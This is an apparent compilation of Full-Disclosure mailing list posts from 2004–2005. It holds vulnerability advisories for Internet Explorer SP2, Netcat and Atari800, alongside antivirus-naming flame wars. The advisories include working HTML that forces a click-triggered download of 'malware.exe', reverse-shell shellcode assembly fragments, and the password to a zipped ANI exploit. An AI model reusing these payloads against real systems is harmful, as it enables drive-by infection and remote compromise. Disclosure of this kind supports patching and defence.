[Full-Disclosure] (no subject)
And why should we even care :-/ ?

- Original Message -
> Whats wrong with slashdot this morning?

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
~~~
Application: Internet Explorer
Vendors: http://www.microsoft.com
Versions: 6.0.2900.2180.xpsp_sp2_rtm.040803-2158
Patched With: SP2
Platforms: Windows
Bug: Remote File Download Information Bar Bypass
Exploitation: Remote with browser
Date: 13 Jan 2005
Author: Rafel Ivgi, The-Insider
e-mail: [EMAIL PROTECTED]
web: http://theinsider.deep-ice.com
~~~

1) Introduction
2) Bugs
3) The Code

~~~
=== 1) Introduction ===

Internet Explorer is currently the most common internet browser in the world. Microsoft Windows XP Service Pack 2 was designed to block any file download by an information bar which must be clicked, with "Download File" selected.

~~~
=== 2) Bug ===

While trying to download a file in Microsoft Internet Explorer, the user gets the information bar. The information bar mechanism blocks/catches all references to downloadable files, even through javascripts and HTML event properties. However, Microsoft's Internet Explorer (SP2) DOES NOT CATCH a body tag with the HTML onclick event which dynamically creates iframe tags. For a good, more complicated dynamic object creation I used the createElement function. This way an attacker can make a user download a file by just clicking anywhere on the page (not on a hyperlink).

~~~
=== 3) The Code ===

Paste into an htm/html file and add < at the beginning of each line:

cut here --
!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN
!-- saved from url=(0031)http://theinsider.deep-ice.com/ --
HTML HEAD TITLE The-Insider http://theinsider.deep-ice.com/ /TITLE
META http-equiv=expires content=01 Jan 1998 01:01:00 GMT
META http-equiv=Content-Type content=text/html; charset=windows-1252
META http-equiv=Content-Language content=en-us
META content=True name=HandheldFriendly
META content=MSHTML 6.00.2900.2523 name=GENERATOR
/HEAD
embed
body onclick='a=document.createElement(\iframe src=\http:\/ \/theinsider.deep- ice.com\/malware.exe/iframe\);document.body.appendChild (a);setTimeout(document.execCommand\(\refresh\),1000)'
cebter br br br br br br Click AnyWhere You Want /center
/BODY
/HTML
cut here --
~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

Scripts and Codes will make me D.O.S, but they will never HACK me.
Re: [Full-Disclosure] (no subject)
Hello, Berend-Jan Wever!

> Here's an exploit for the ANI stack overflow, written for win2ksp4en, IE SP1. Dunno if it will work for other platforms, might need some more tweaking of the ani file. Let me know if it doesn't work, but only if you can hand me some proper debugging details. Since my ISP detects it as Exploit.HTML.IFrameBOF-4 I put the thing in a password protected zip file. The password is margrieta.
> PGP: key ID 0x48479882

Could you send a PGP signature for your zip?

--
Best regards,
Raoul Nakhmanson-Kulish
Elfor Soft Ltd., ERP Department
http://www.elforsoft.ru/
[Full-Disclosure] (no subject)
December 26, 2004

Hat-Squad Advisory: Remote buffer overflow in Netcat TCP/IP Swiss Army Knife

Product: Netcat - nc11nt.zip
Vendor Url: http://www.securityfocus.com/tools/139/scoreit
Version: Netcat v1.1
Vulnerability: Remote stack overflow in the DNS control part
Release Date: 26 December, 2004
Vendor Status: Informed on 10 November 2004
Response: 11 November 2004
No fix

Overview:

The program 'netcat' is an advanced form of the Telnet command when used in a hacker's hands. Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it can also be used as a network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Standard input is normally sent to the host, and anything that comes back across the connection is sent to standard output. This continues indefinitely, until the network side of the connection shuts down. Netcat can also function as a server, by listening for inbound connections on arbitrary ports and then doing the same reading and writing.

Problem:

1. Stack based Buffer Overflow:

Due to a boundary check bug in the DNS part, sending a client command with more than 256 bytes will cause a stack buffer overflow. This vulnerability can compromise several tools working without a port listener, such as the uw-imapd set of tools (www.washington.edu/imap/) when loaded with netcat; this is tested vulnerable. Read the PoC code if you need more information on this vulnerability.

Discovery and Proof Of Concept Exploit by class101 ([EMAIL PROTECTED])

Greetings to Nima Majidi and Behrang Fouladi!

-=Hat-Squad.com=-

--

/*
Netcat v1.1, -e Switch, Remote Buffer Overflow Exploit v0.1

Homepage..........: http://www.securityfocus.com/tools/139/scoreit
Affected versions.: v1.1
Fix...............: Actually none; Hobbit was warned 1 month+ ago and looks like he will not act, so we let him spread a backdoor :)
Risk..............: Highly critical.
 - Almost everything loaded as "nc ... -e ..." is vulnerable
 - Educational tools such as the uw-imapd (http://www.washington.edu/imap/) contain no port listener; if it's loaded with netcat (ie: nc -L -p 143 -t -e imapd.exe, 25 -t -e pop3d.exe etc.) it is vulnerable. This small example shows you the large impact of this hole.
 - Tools built on netcat are, I guess, vulnerable, such as the netcat with authentication or other tools based on netcat without a security check on src.
 - Next time you run netcat -e, be sure of what you run, because as Hobbit said, the -e switch is really DANGEROUS!! :DDD
Compilation.......: 101_ncat.cpp ... Win32 (MSVC, cygwin)
                    101_ncat.c ..... Linux (FreeBSD, etc.)
Greetings.........: Nima Majidi, Behrang Fouladi (cool teammates ;p)
                    DiabloHorn, kimatrix (KD-Team guys)
                    Nicolas Waisman, MMiller (skape), H.D Moore, BJWever (for the help)
                    Brett Moore (for all the help and especially for suggesting to me that way of calling MSVCRT.system:

    ; call system()
    mov eax,1656E64h    ; mov cmd + 01010101 to eax
    sub eax,01010101h   ; sub 01010101
    push eax            ; Push cmd on stack with our null byte :)
    push esp            ; Location to cmd
    call ebp            ; Call system()

Via that way you can push \x00cmd on the stack without breaking your payload, because in the public shellcode that he published on the mailing list:

    ; Call system()
    push 20646D63h      ; Push cmd on stack, null exists from above
    push esp            ; Location to cmd
    call ebp            ; Call system()

Sure it's smaller to push \x20cmd directly, but MSVCRT.system was also grabbing invalid unicode chars before \x20cmd, including esp pointing to cmd (windows bug ?:) (on w2k sp4 server).

Else, to bypass a bad char, I do a small change, adding 6 nops, to kick out \x0A bugging there for netcat and prolly more. This to finally say that the size of the shellcode is now 220 bytes instead of 205 (still awesome for a reverse cmd generic win32 shellcode). Tested working on W2k SP4, XP all SP. Excellent job by Brett Moore, to whom I throw all credits because this shellcode is the brain of that exploit ;)

Extra.............:
!All tests were made on nc.exe from http://www.securityfocus.com/tools/139/scoreit!
!All tests were made loading netcat: nc -L -p 143 -t -e c:\imapd.exe!
[Full-Disclosure] (no subject)
Had a mistake in my code, oh well. Works now.

PoC:
http://www.michaelevanchik.com/security/microsoft/ie/xss/index.html
http://www.michaelevanchik.com/security/microsoft/ie/xss/writehta.txt

-- avp's should add this

Here is some new adodb code AVP's should add. No longer needed to connect to external source. Malicious recordset can be built locally.

www.michaelevanchik.com
[Full-Disclosure] (no subject)
Name: Atari800
Vendor URL: http://atari800.sourceforge.net/
Author: Adam Zabrocki [EMAIL PROTECTED]
Date: November 20, 2004

Issue:

Atari800 - free and portable Atari800/XL/XE/5200 emulator - allows an attacker to execute shellcode with suid root privileges where Atari800 is installed.

Description:

Atari800 is a free and portable Atari800/XL/XE/5200 emulator, originally written by David Firth and now developed by the Atari800 Development Team. This program is copyrighted and released under the GPL.

Details:

Possible to execute shellcode via function Aprint(), badly called in function Atari800_Initialise(). Local users able to run atari800 (in the default installation atari800 is suid root) are able to execute shellcode with root privileges. The problem lies in the Atari800_Initialise() function, which makes a bad call to function Aprint().

src/atari.c

int Atari800_Initialise(int *argc, char *argv[])
{
    int error = FALSE;
    ...
    ...
    ...
    ...
    /*
     * Any parameters left on the command line must be disk images.
     */
    for (i = 1; i < *argc; i++) {
        if (!SIO_Mount(diskno++, argv[i], FALSE)) {
![1]!       Aprint("Disk File %s not found", argv[i]);
            error = TRUE;
        }
    }

    if (error) {
![2]!   Aprint("Usage: %s [options] [diskfile1...diskfile8]", argv[0]);
        Aprint("\t-help         Extended Help");
        Atari800_Exit(FALSE);
        return FALSE;
    }
    ...
    ...
}

Function Aprint() is written by the program's authors.

src/log.c

void Aprint(char *format, ... )
{
    va_list args;
    char buffer[256];
#ifdef BUFFERED_LOG
    int buflen;
#endif

    va_start(args, format);
    vsprintf(buffer, format, args);
    va_end(args);

#ifdef BUFFERED_LOG
    strcat(buffer, "\n");
    buflen = strlen(buffer);
    if ((strlen(memory_log) + strlen(buffer) + 1) > MAX_LOG_SIZE)
        *memory_log = 0;
    strcat(memory_log, buffer);
#else
    printf("%s\n", buffer);
#endif
}

We can control argument argv[0], which is given to function Aprint(), which calls vsprintf() and in the end can overflow. When we create a symlink to the real path of atari800, argv[0] will be changed. Exploiting this bug can give root privileges.

This bug exists in older Atari800 (I read the source of version 1.3.0); in the latest version there isn't an overflow in the Aprint() function. It was rewritten!

Atari800 has other bugs which exist when the program reads the config file. The bugs exist in function RtConfigLoad().

src/rt-config.c

int RtConfigLoad(const char *alternate_config_filename)
{
    FILE *fp;
    const char *fname = rtconfig_filename;
    int status = TRUE;
    char string[256];
    char *ptr;
    ...
    ...
    while (fgets(string, sizeof(string), fp)) {
        RemoveLF(string);
        ptr = strchr(string, '=');
        if (ptr) {
            *ptr++ = '\0';
            if (strcmp(string, "OS/A_ROM") == 0)
![3]!           strcpy(atari_osa_filename, ptr);
            else if (strcmp(string, "OS/B_ROM") == 0)
![4]!           strcpy(atari_osb_filename, ptr);
            else if (strcmp(string, "XL/XE_ROM") == 0)
![5]!           strcpy(atari_xlxe_filename, ptr);
            else if (strcmp(string, "BASIC_ROM") == 0)
![6]!           strcpy(atari_basic_filename, ptr);
            else if (strcmp(string, "5200_ROM") == 0)
![7]!           strcpy(atari_5200_filename, ptr);
            else if (strcmp(string, "DISK_DIR") == 0) {
                if (disk_directories == MAX_DIRECTORIES)
                    printf("All disk directory slots used!\n");
                else
![8]!               strcpy(atari_disk_dirs[disk_directories++], ptr);
            }
            else if (strcmp(string, "ROM_DIR") == 0)
![9]!           strcpy(atari_rom_dir, ptr);
            else if (strcmp(string, "H1_DIR") == 0)
![10]!          strcpy(atari_h1_dir, ptr);
            else if (strcmp(string, "H2_DIR") == 0)
![11]!          strcpy(atari_h2_dir, ptr);
            else if (strcmp(string, "H3_DIR") == 0)
![12]!          strcpy(atari_h3_dir, ptr);
            else if (strcmp(string, "H4_DIR") == 0)
![13]!          strcpy(atari_h4_dir, ptr);
            ...
            else if (strcmp(string, "EXE_DIR") == 0)
![14]!          strcpy(atari_exe_dir, ptr);
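The two defect patterns in the advisory above, an unbounded vsprintf() into a 256-byte stack buffer fed with argv[0] and unbounded strcpy() of config values, beside bounded replacements. This is an added example and not the Atari800 project's or the advisory author's code; the names aprint_safe, copy_config_path and handle_config_line, and the 256-byte size for the filename arrays, are assumptions, and the oversized program name and config line are constructed inputs.

```c
/* Added example: bounded counterparts of the Aprint()/RtConfigLoad()
 * patterns from the advisory. Buffer size 256 is from the advisory;
 * the filename array size is assumed. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define LOG_BUF 256        /* Aprint()'s buffer size in the advisory */
#define PATH_MAX_LEN 256   /* assumed size of the atari_*_filename arrays */

/* Bounded replacement for Aprint(): vsnprintf() never writes past the
 * buffer and reports how long the full message would have been.
 * Returns 1 if the message was truncated, 0 otherwise. */
int aprint_safe(char *out, size_t outlen, const char *format, ...)
{
    va_list args;
    int needed;

    va_start(args, format);
    needed = vsnprintf(out, outlen, format, args);
    va_end(args);
    if (needed < 0) {          /* encoding error: leave an empty string */
        out[0] = '\0';
        return 1;
    }
    return (size_t)needed >= outlen;
}

/* Bounded replacement for the strcpy(atari_*_filename, ptr) lines:
 * rejects values that do not fit instead of overflowing or silently
 * truncating a path. Returns 0 on success, -1 if the value is too long. */
int copy_config_path(char *dst, size_t dstlen, const char *value)
{
    size_t n = strlen(value);

    if (n >= dstlen) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, value, n + 1);
    return 0;
}

/* Parse one "KEY=VALUE" line the way RtConfigLoad() does, handling only
 * OS/A_ROM here. Returns 1 if stored, 0 if the key is unknown, -1 if the
 * line has no '=' or the value was rejected as oversized. */
int handle_config_line(char *line, char *osa_rom, size_t osa_len)
{
    char *ptr = strchr(line, '=');

    if (!ptr)
        return -1;
    *ptr++ = '\0';
    if (strcmp(line, "OS/A_ROM") == 0)
        return copy_config_path(osa_rom, osa_len, ptr) == 0 ? 1 : -1;
    return 0;
}

/* Build the usage message from Atari800_Initialise() with a constructed
 * program name of name_len 'A's (what a long symlink name puts in
 * argv[0]). Returns 1 when the bounded logger had to truncate. */
int demo_usage_message(size_t name_len)
{
    char name[1024];
    char buffer[LOG_BUF];

    if (name_len >= sizeof name)
        name_len = sizeof name - 1;
    memset(name, 'A', name_len);
    name[name_len] = '\0';
    return aprint_safe(buffer, sizeof buffer,
                       "Usage: %s [options] [diskfile1...diskfile8]", name);
}

/* Feed a constructed "OS/A_ROM=BBBB..." line of value_len 'B's through
 * the bounded loader. Returns 1 when stored, -1 when rejected. */
int demo_config_line(size_t value_len)
{
    char line[1024];
    char rom[PATH_MAX_LEN];
    size_t prefix = strlen("OS/A_ROM=");

    if (prefix + value_len >= sizeof line)
        value_len = sizeof line - prefix - 1;
    memcpy(line, "OS/A_ROM=", prefix);
    memset(line + prefix, 'B', value_len);
    line[prefix + value_len] = '\0';
    return handle_config_line(line, rom, sizeof rom);
}

int main(void)
{
    printf("10-byte argv[0]  truncated: %d\n", demo_usage_message(10));
    printf("600-byte argv[0] truncated: %d\n", demo_usage_message(600));
    printf("40-byte ROM path   stored: %d\n", demo_config_line(40));
    printf("300-byte ROM path  stored: %d\n", demo_config_line(300));
    return 0;
}
```

With the original vsprintf()/strcpy() the 600-byte name and 300-byte path would run past the 256-byte buffers; here the oversized inputs are reported and rejected.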
[Full-Disclosure] (no subject)
Please make a note of this email address change.

For business related items, please contact me at [EMAIL PROTECTED]
For personal emails, please contact me at [EMAIL PROTECTED]

Thank you!
[Full-Disclosure] (no subject)
Oh my Gawd! I think I've fallen in love! You will be hearing from me soon!

> --__--__--
>
> Message: 4
> Date: Wed, 13 Oct 2004 10:28:40 -0700 (MST)
> From: Jay Jacobson [EMAIL PROTECTED]
> To: Mr. Rufus Faloofus [EMAIL PROTECTED]
> cc: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] Nessus experience
>
> SNIP
>
> Of course, another good place for these questions would be the Nessus mailing list. You may also want to check out Edgeos' Nessus Knowledge Base, which documents every configuration option in Nessus: http://www.edgeos.com/nessuskb/.
>
> --
> .. Jay Jacobson
> .. Edgeos, Inc. - 480.961.5996 - http://www.edgeos.com
> .. Network Security Auditing and
> .. Vulnerability Assessment Managed Services
>
> --__--__--

thank you
Randall M
Re: [Full-Disclosure] (no subject) (try using a friggin subject line...)
who are you friggen Dr Evil?

On Friday 13 August 2004 07:04 pm, KF_lists wrote:
> Insert subject here ^
>
> -KF
Re: [Full-Disclosure] (no subject) (try using a friggin subject line...)
I'm Rick James bitch!

-KF

Adam wrote:
> who are you friggen Dr Evil?
>
> On Friday 13 August 2004 07:04 pm, KF_lists wrote:
> > Insert subject here ^
> >
> > -KF
Re: [Full-Disclosure] (no subject)
On Sun, Aug 15, 2004 at 01:52:33PM +0200, Maarten wrote:
> On Sunday 15 August 2004 04:52, Nick FitzGerald wrote:
> > Maarten wrote:
>
> yada yada. You may work in the industry (and be blind because of it) and I may have an incredibly high IQ (so much higher than yours that you perceive I'm stupid instead). But the thing is, you don't know that. So stop bashing me and showing off. You can shine by your actions, not by your reputation...

So what is your knowledge about malware naming? You know about the wildlist and its problems, Vgrep, CARO, 'naming.txt' and its use in the last 10 years? You have ever tried to maintain and work with a malware collection? You know about previous (and more in-depth) discussions on this topic? You've read at least http://www.securityfocus.com/infocus/1587 and http://www.virusbtn.com/magazine/archives/200301/caro.xml to get a basic idea of the problem? So what rational fact makes you believe you know this better than everyone else?

> All change starts small. Maybe discussions such as this will wake people up, maybe there will even be a voiced demand from the public. That DOES hurt sales, thus shareholders, which is what you need to have done, right?

The only thing I'm sure about is, YOU will not be instrumental in this. Do you really think there were any new ideas here? For an example, here at the antiVirusTestCenter we have discussed the naming problems for years. But even the partial solutions that have been realized (LOKMM, VMacro-Server) haven't caused significant changes. And this was in cooperation with many AV researchers. How should such an annoying thread like this really help? Do you also believe you can convince MS to make Windows OpenSource just by posting here?

> Well, just for you, to make it simple. At Time T you find a virus and name it whatever you like (just as you do now). From time T until T+48h you have the all-important hours of confusion as you are so adamant to repeat at every opportunity. So let there be confusion. At Time T+50 you agree upon a singular standardized name and rename it. So, compared to now, what has changed between T and T+48?? Nothing. So stop complaining about me messing up those all-important hours of yours. I'm not messing anything up. I'm renaming when the panic has died down. Get it now?!?!

And what is the benefit of your proposal? Have you considered that it may be just another source of confusion? There could be uncoordinated renamings, the same malware alerts with old and new names (but this time from the same vendor). Administrators may not be able to compare scan reports from different malware definition updates because the names changed in between.

> > The first few hours _under current processes_ produce nearly all of the confusion caused by naming inconsistencies. Media outlets latch onto
>
> This is not a scientific fact, and I do not agree with you.

I can't remember _any_ scientific fact in this thread.

--
Michel Messerschmidt [EMAIL PROTECTED]
antiVirusTestCenter, Computer Science, University of Hamburg
Re: [Full-Disclosure] (no subject) BORING
This is too boring. *Please* can you all desist? Entrenched positions aren't going to be changed by this back-biting, flaming and personal attacks (you know who you are). You're damaging your own reputations on this thread. Don't forget it's all searchable on Google. This thread has been going on for too long.

> Do you also believe you can convince MS to make Windows OpenSource just by posting here?

No.

> Maybe discussions such as this will wake people up, maybe there will even be a voiced demand from the public.

Maybe not. This isn't the forum for such 'discussions'. This is supposed to be a list for disclosing new and/or relevant information about security threats. OK?

---
Dictionary.com

troll: An electronic mail message, Usenet posting or other (electronic) communication which is intentionally incorrect, but not overtly controversial (compare flame bait), or the act of sending such a message. Trolling aims to elicit an emotional reaction from those with a hair-trigger on the reply key. A really subtle troll makes some people lose their minds.

I'm sure it's not intentionally incorrect but apart from that ...
---
Does HoTMaiL come with a spell checker?
---
Re: [Full-Disclosure] (no subject)
Nick et al...

After having really suffered the thread(s), what is missing is this: Most SysAdmins do not know what it takes to run a business. Most Business Administrators do not know what it takes to run a network. With that said, Maarten will never understand the Business Point that you are making, nor will most other SysAdmins. The bottom line is, no matter how many technical people would like it, or whether it would actually make Sense AND make Everyone's lives easier, the bean counters prevent it; there is no Profit.

At 02:52 PM 8/15/2004 +1200, Nick FitzGerald wrote:
> Maarten wrote:
>
> > First off: Nick, please lose that damn attitude of yours !
>
> Why? You're clearly ignorant of what you are talking about, yet you speak with an air as if you do know something about the topic. Further, your ignorance would have been cured by carefully reading all of the foregoing thread. There's a point where the idiocy and chutzpah that several have shown in this thread makes them no longer worthy of polite consideration and at that point I usually adopt the "beat it into them in case that helps" approach...
>
> > Further, by hammering on the endless we-have-done-it-for-many-years-so-who-are-you-to-tell-us-differently part you're actually making yourself part of the problem, not part of the solution.
>
> You show more and more of your ignorance each time you open your mouth. _If_ this problem is ever solved, it is very likely that I will have been a not insignificant part of that solution. I can't prove that to you but it is just one of those things and probably undeniable to anyone who knows what they are talking about when discussing this problem.
>
> > You're saying that internal procedures make it so difficult to adapt names after the fact. When in fact the strength of a company, any company, IS to be able to adapt to changing circumstances. And if they're not able to, eventually they will go the way of the dinosaurs.
>
> You are confusing two different aspects of the AV industry. Yes, the industry has to be quite flexible and able to quickly react to significant shifts in the malware detection problem set. That does not mean it has to be equally flexible (or even flexible in the tiniest little bit) when it comes to malware naming, as the last 15 years of commercial AV software development, marketing and sales prove. Your suggestion is found wanting in the light of significant history -- care to make some more obviously uninformed comments??
>
> > The only thing Todd (and I) are trying to say is that it is possible to rename after the fact.
> > ...
>
> Of course it is. I never denied that. I have, however, pointed out several reasons why that generally doesn't happen, why that situation is very unlikely to change _AND_ why it would not be particularly helpful even if it did change. In response to those explanations you and Todd (and some others) just keep dumbly repeating "but they should change". Something we both agree on. The difference is that in designing a better naming system, I am not limited to parrotting stupid inanities about things I don't understand -- I can analyse the history in multi-layered and interacting terms of the industry's technical, economic and political development, its current internal culture, place that in larger market and political contexts, and as a result make useful suggestions that are much more likely to be adopted inside the industry and that mean the industry can change to better suit those external factors. I can also advise those outside AV what elements of those environments they may best and most easily change to increase the likelihood the AV industry will make suitable changes.
>
> I await your parrot squawk response... NOT!
>
> > ... I don't #!%$* care how many old Cobol programs need adapting for that to get possible, but the fact remains that it IS.
>
> _Theoretically_, yes. I have now lost track of how many times I have agreed with you (and others) on this now. The larger and much more salient fact is that, in today's market (and everything that has gone before it), there is no compelling reason for several of the very large players to make the expenditure and introduce the huge upheavals to internal processes (that are clearly working because these companies have not gone the way of the dinosaurs and, to the contrary, are experiencing some of their strongest growth ever) that fixing the naming problem will require.
>
> > Don't start again about how your current procedures may prevent or complicate that. Worse integration problems, by far more complex and bigger companies or conglomerates are being tackled every day.
>
> Yeah.
>
> > To name a few? How about mergers, or international intelligence-exchange between law enforcement agencies. Do you think that they let anyone stop them by complaining that database format X isn't readily compatible with format Y? No. They fix it, they make it work together no matter what. So don't start about how impossible it is for you to rename one simple
Re: [Full-Disclosure] (no subject)
On Sunday 15 August 2004 04:52, Nick FitzGerald wrote:
> Maarten wrote:
>
> > First off: Nick, please lose that damn attitude of yours !
>
> Why?

Because you're being rude, and anti-social. You don't score points with this. Jeez, why do I even HAVE to explain things like this. SO typical.

> You're clearly ignorant of what you are talking about, yet you speak with an air as if you do know something about the topic. Further, your ignorance would have been cured by carefully reading all of the foregoing thread. There's a point where the idiocy and chutzpah that several have shown in this thread makes them no longer worthy of polite consideration and at that point I usually adopt the "beat it into them in case that helps" approach...

yada yada. You may work in the industry (and be blind because of it) and I may have an incredibly high IQ (so much higher than yours that you perceive I'm stupid instead). But the thing is, you don't know that. So stop bashing me and showing off. You can shine by your actions, not by your reputation...

> > Further, by hammering on the endless we-have-done-it-for-many-years-so-who-are-you-to-tell-us-differently part you're actually making yourself part of the problem, not part of the solution.
>
> You show more and more of your ignorance each time you open your mouth.

You ARE part of the problem! You leave no opportunity unused to bash opponents instead of using solid arguments.

> _If_ this problem is ever solved, it is very likely that I will have been a not insignificant part of that solution. I can't prove that to you but it is just one of those things and probably undeniable to anyone who knows what they are talking about when discussing this problem.

Which coincidentally, by your own admission, would be only you. So you're effectively saying: "I will probably agree with myself." Well, whoopty-doo... big surprise there.

> > You're saying that internal procedures make it so difficult to adapt names after the fact. When in fact the strength of a company, any company, IS to be able to adapt to changing circumstances. And if they're not able to, eventually they will go the way of the dinosaurs.
>
> You are confusing two different aspects of the AV industry. Yes, the industry has to be quite flexible and able to quickly react to significant shifts in the malware detection problem set. That does not mean it has to be equally flexible (or even flexible in the tiniest little bit) when it comes to malware naming, as the last 15 years of commercial AV software development, marketing and sales prove. Your suggestion is found wanting in the light of significant history -- care to make some more obviously uninformed comments??

I'm not confusing anything. The statement about needing to be flexible applies to ALL companies, on ALL aspects. It is stupid to think that a company can be inflexible in one thing while being flexible in another.

> > The only thing Todd (and I) are trying to say is that it is possible to rename after the fact.
> > ...
>
> Of course it is. I never denied that.

Yes, you did.

> I have, however, pointed out several reasons why that generally doesn't happen, why that situation is very unlikely to change _AND_ why it would not be particularly helpful even if it did change. In response to those explanations you and Todd (and some others) just keep dumbly repeating "but they should change". Something we both agree on. The difference is that in designing a better naming system, I am not limited to parrotting stupid inanities about things I don't understand -- I can analyse the history in multi-layered and interacting terms of the industry's technical, economic and political development, its current internal culture, place that in larger market and political contexts, and as a result make useful suggestions that are much more likely to be adopted inside the industry and that mean the industry can change to better suit those external factors. I can also advise those outside AV what elements of those environments they may best and most easily change to increase the likelihood the AV industry will make suitable changes.

No, you're a shining example of being too close to your subject to have an impartial and unclouded view.

> I await your parrot squawk response... NOT!

I'm happy to say I don't care whether you await it or not.

> > ... I don't #!%$* care how many old Cobol programs need adapting for that to get possible, but the fact remains that it IS.
>
> _Theoretically_, yes. I have now lost track of how many times I have agreed with you (and others) on this now. The larger and much more salient fact is that, in today's market (and everything that has gone before it), there is no compelling reason for several of the very large players to make the expenditure and introduce the huge upheavals to internal processes (that are clearly working because these companies have not gone the way of the dinosaurs
RE: [Full-Disclosure] (no subject)
Brad Griffin wrote:

> [big snip]
>
> I can't understand how the Google research is a problem with naming conventions. Google for a virus name and multiple hits come up, mostly for descriptions on a/v sites that also carry the alias names in most cases.

The problem with such Google research (or with using VGrep) is that it is too much after the event. As I keep saying, and as admins everywhere keep agreeing with me, the biggest part of the naming inconsistency problem occurs in the first few hours of an outbreak (or suspected outbreak) event. Neither Google nor VGrep can help you then...

Some AV developers have taken more care to list the names they know their competitors are using by the time they post a web description of a new virus, and some make the effort to update that list for the hours or days following an outbreak, at least for high interest viruses, but that is only a partial solution to the problem.

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
Re: [Full-Disclosure] (no subject)
Maarten wrote: First off: Nick, please lose that damn attitude of yours ! Why? You're clearly ignorant of what you are talking about, yet you speak with an air as if you do know something about the topic. Further, your ignorance would have been cured by carefully reading all of the foregoing thread. There's a point where the idiocy and chutzpah that several have shown in this thread makes them no longer worthy of polite consideration and at that point I usually adopt the "beat it into them in case that helps" approach... Further, by hammering on the endless we-have-done-it-for-many-years-so-who-are-you-to-tell-us-differently part you're actually making yourself part of the problem, not part of the solution. You show more and more of your ignorance each time you open your mouth. _If_ this problem is ever solved, it is very likely that I will have been a not insignificant part of that solution. I can't prove that to you but it is just one of those things and probably undeniable to anyone who knows what they are talking about when discussing this problem. You're saying that internal procedures make it so difficult to adapt names after the fact. When in fact the strength of a company, any company, IS to be able to adapt to changing circumstances. And if they're not able to, eventually they will go the way of the dinosaurs. You are confusing two different aspects of the AV industry. Yes, the industry has to be quite flexible and able to quickly react to significant shifts in the malware detection problem set. That does not mean it has to be equally flexible (or even flexible in the tiniest little bit) when it comes to malware naming, as the last 15 years of commercial AV software development, marketing and sales prove. Your suggestion is found wanting in the light of significant history -- care to make some more obviously uninformed comments?? The only thing Todd (and I) are trying to say is that it is possible to rename after the fact. ... Of course it is. 
I never denied that. I have, however, pointed out several reasons why that generally doesn't happen, why that situation is very unlikely to change _AND_ why it would not be particularly helpful even if it did change. In response to those explanations you and Todd (and some others) just keep dumbly repeating "but they should change". Something we both agree on. The difference is that in designing a better naming system, I am not limited to parrotting stupid inanities about things I don't understand -- I can analyse the history in multi-layered and interacting terms of the industry's technical, economic and political development, its current internal culture, place that in larger market and political contexts, and as a result make useful suggestions that are much more likely to be adopted inside the industry and that mean the industry can change to better suit those external factors. I can also advise those outside AV what elements of those environments they may best and most easily change to increase the likelihood the AV industry will make suitable changes. I await your parrot squawk response... NOT! ... I don't #!%$* care how many old Cobol programs need adapting for that to get possible, but the fact remains that it IS. _Theoretically_, yes. I have now lost track of how many times I have agreed with you (and others) on this now. The larger and much more salient fact is that, in today's market (and everything that has gone before it), there is no compelling reason for several of the very large players to make the expenditure and introduce the huge upheavals to internal processes (that are clearly working because these companies have not gone the way of the dinosaurs and, to the contrary, are experiencing some of their strongest growth ever) that fixing the naming problem will require. Don't start again about how your current procedures may prevent or complicate that. 
Worse integration problems, by far more complex and bigger companies or conglomerates are being tackled every day. Yeah. To name a few ? How about mergers, or international intelligence-exchange between law enforcement agencies. Do you think that they let anyone stop them by complaining that database format X isn't readily compatible with format Y ? No. They fix it, they make it work together no matter what. So don't start about how impossible it is for you to rename one simple entry. Both your belief in, and your abject inability to see, your own ignorance are truly astonishing! As Valdis (?) has already addressed the most egregious flaws of your logic here, I'll move on to other, more AV-specific issues. To conclude, I'd like to put serious question marks by your statement that the first few hours are the all-important ones. First off, by renaming after the fact (after the first few hours/days/weeks) no-one is changing ANYTHING about those first hours so you shouldn't have
[Full-Disclosure] (no subject) Why not?
Brad Griffin wrote: I am yet to come across a 'large' company or enterprise that uses separate brand av applications for desktop and server solutions. It makes economic and logistic sense to use one vendor for your av solution that is deployed at different levels (or layers if you prefer that terminology). About the only people I've seen use different antivirus products in one environment are home users or small businesses that misinterpret 'layers of defence' in an anti-virus context to mean 'different brands of defence'. Considering that many major av co's products are cross platform nowadays, I doubt many companies will continue using separate brand products in a mixed OS environment for much longer either. Reply: The last two companies I have worked for, one a Fortune 500 company, the other a smallish science company, both use multiple products. One uses Symantec on the Windows servers and McAfee on the Windows workstations and Clam on the Linux servers and workstations. The other uses Clam on its Linux servers and Panda on its Windows servers and workstations. Of course, that hasn't completely stopped virus outbreaks, just because there's no way that new definitions can be rolled out quickly enough. As you might expect, Windows laptops were the main culprits. But I have seen Linux viruses and breakins as well as Windows hacks too. And please don't say that the IT wasn't doing its job. As long as you have an internet presence you are a target, and none of the products are 100% secure ... Cisco anyone? So there you go. My two Euros worth. Does anyone remember the AV scanner that came with MS-DOS6? Haha --- Does HoTMaiL come with a spell checker? ---
Re: [Full-Disclosure] (no subject)
I can easily understand how someone unversed in the _market forces_ pertaining to antivirus software could hold that position, and as a theoretical solution to the problem of lack of cross-vendor naming coordination it has often been suggested even by those who know it would never work in the real world. Neat and tidy as such a solution seems, it will not, however, work. As I explained in other of my posts in this and the related AV Naming Convention thread, in general by far the largest cost of naming disagreement is borne by the users in the early hours of large-scale outbreaks. Thus, a solution that specifically _requires_ all vendors to use a different name until a name is agreed (no matter what this process it will take some _additional_ time) is, by design, an _anti-solution_ as such a solution, by design, ensures perfect naming inconsistency at the time the highest cost of naming inconsistency is borne. Vendors should not have to use a different name until the real one is determined, they should use whatever they want to. You know what, I don't work in the anti-virus field, but what you are saying is BS. There is no good reason that I can think of that the AV companies cannot rename these things after the fact. When an outbreak happens, they provide a fix and name it whatever they want. After the fact, they could rename things and their updates reflect the proper name. They can keep a reference to their name in the description, what's a few more characters in the signature files for every piece of malware going to matter? another 100k in a download at most? I agree that there is probably a lot of marketing pressure that may make this difficult, but there is no technical reason for it. The AV companies cannot be that lame that they cannot handle a simple name change. I mean we use databases and other things and using these computers that should make this easy. If they are that lame, maybe they shouldn't be in business. 
